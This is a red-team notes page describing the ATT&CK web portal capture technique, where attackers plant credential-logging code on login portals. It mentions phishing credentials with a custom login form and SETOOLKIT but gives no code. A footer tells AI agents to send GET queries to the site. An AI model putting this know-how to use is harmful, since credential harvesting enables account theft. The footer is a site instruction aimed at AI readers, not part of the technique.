# Web Portal Capture

Adversaries may install code on externally facing portals, such as VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.

This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts or as part of the Initial Compromise by exploitation of the externally facing web service.

**Example:**

Here by creating a simple login form in HTML and combining it with the SETOOLKIT Tool this custom login form will capture credentials from the user, this will just need some social engineering to have the user enter their credentials.

![](/files/-MRkg7jzW0FER3eC55z5)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/credential-access/t1056-input-capture/web-portal-capture.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.